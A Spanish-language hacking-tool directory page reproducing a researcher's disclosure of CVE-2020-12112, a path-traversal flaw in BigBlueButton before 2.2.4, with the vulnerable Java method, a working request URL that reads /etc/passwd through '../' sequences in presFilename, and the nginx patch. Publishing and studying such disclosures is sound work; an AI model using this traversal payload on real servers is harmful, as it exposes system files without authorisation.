Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-12112 — Las versiones de BigBlueButton inferiores a 2.2.4 tienen una vulnerabilidad LFI que permite acceder a archivos sensibles. 🚨 | Kitploit
Herramientas/GitHubGitHub/tchenu/cve-2020-12112
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubtchenu/cve-2020-12112

CVE-2020-12112

Las versiones de BigBlueButton inferiores a 2.2.4 tienen una vulnerabilidad LFI que permite acceder a archivos sensibles. 🚨

Ver Repositorio
144hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-12112 🚨

Las versiones de BigBlueButton inferiores a 2.2.4 tienen una vulnerabilidad LFI que permite el acceso a archivos sensibles.

Historia 📜

Durante un curso de aprendizaje a distancia en una instancia de BigBlueButton, un estudiante de mi clase compartió el enlace de la presentación de diapositivas de mi profesor y noté que el nombre del archivo estaba incluido en la URL.

Slack de la escuela

Student: "No need to write notes, I've got the slide."
Me: Well, I've got a security report to make. 😂

Jugando un poco con él, pude obtener acceso al archivo /etc/passwd del servidor y descubrir la existencia de una vulnerabilidad de seguridad en la solución de código abierto Big Blue Button.

Reporté la vulnerabilidad, el equipo de BBB fue rápido en responderme y parchear la vulnerabilidad (solo unos días).

Poc 🧙

public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

Como puedes ver, este método utilizado por un PresentationController te permite descargar un archivo de presentación concatenando 3 parámetros.

  • Ruta absoluta del archivo
  • Un carácter separador
  • Nombre del archivo

Esto hace posible obtener enlaces como este:

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

Para explotar la vulnerabilidad, solo basta con obtener un enlace válido a un archivo de presentación y modificar el parámetro presFilename para acceder a archivos sensibles.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

Archivo /etc/passwd

Parche 🤕

El equipo de BBB parcheó la vulnerabilidad en la versión 2.2.4 mediante una regla de configuración del servidor (HTTP), una expresión regular y un formato de nombre de archivo preciso.

		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

Referencias 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
Descargar herramienta